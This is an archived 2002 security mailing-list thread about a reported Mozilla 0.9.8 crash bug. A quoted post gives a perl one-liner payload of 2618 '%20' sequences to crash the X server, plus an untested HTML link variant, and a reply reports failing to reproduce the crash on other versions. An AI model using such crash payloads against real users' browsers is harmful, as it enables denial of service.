On Sun, 2002-02-17 at 16:24, Replugge [Rod] wrote: > NOTE TO THE MODERATOR: This was sent yesterday but i guess didn't > make it since this doesn't seem to affect a redhat itself, it affects > the mozilla packages distrbuted by Ximian: > > The test system look like: > > bash#~ rpm -qa | grep mozilla > mozilla-0.9.8-1.ximian.2 > mozilla-mail-0.9.8-1.ximian.2 > mozilla-xmlterm-0.9.8-1.ximian.2 > mozilla-devel-0.9.8-1.ximian.2 > nautilus-mozilla-1.0.6-ximian.4 > mozilla-psm-0.9.8-1.ximian.2 > kdebindings-kmozilla-2.1.1-1 > > This was tested in both RH7.1 and 7.2 with Ximian Gnome.(with all the > the updates). > > > There is a bug in mozilla 0.9.8-1 which allows you > to Crash the X server. > > I won't go into details I'll just show the proof > of concept. > > > exploit: > > Local: > bash#~ mozilla `perl -e "print '%20' x 2618"` > > > Remote: > I haven't test this but i guess: > > echo "<a href=http://`perl -e "print '%20' x 2618"`>attack_me</a>" >> > ./attack.html > > perhaps using "img src" or java script... > > > Best Regards > > -- > /* > Rodrigo Gutierrez <rodrigoat_private> > Trustix AS http://www.trustix.com > */ > One one box: rpm -qa | grep mozilla mozilla-chat-0.9.7-1 mozilla-mail-0.9.7-1 nautilus-mozilla-1.0.6-ximian.6 mozilla-0.9.7-1 mozilla-devel-0.9.7-1 mozilla-js-debugger-0.9.7-1 mozilla-psm-0.9.7-1 mozilla-dom-inspector-0.9.7-1 Results in "www.perl -e "print %20 x 2618".com could not be found (lol) perl -e "print '%20' x 2618" prints %20 (2618 times) and doesn't overflow perl. On other box: rpm -qa | grep mozilla nautilus-mozilla-1.0.6-ximian.6 mozilla-psm-0.9.8-2 mozilla-0.9.8-2 mozilla-devel-0.9.8-2 Results in same 'not found' error. The attack.html (as per your script) results in "www.'perl not found". So if it does crash your X, it wasn't present in 0.9.7-1 and is fixed in 0.9.8-2. -- NyQuist | Matthew Hall -- NyQuist at ntlworld dot com Sig: Microsoft sells you Windows. Linux gives you the whole house.
This archive was generated by hypermail 2b30 : Sun Feb 17 2002 - 10:38:53 PST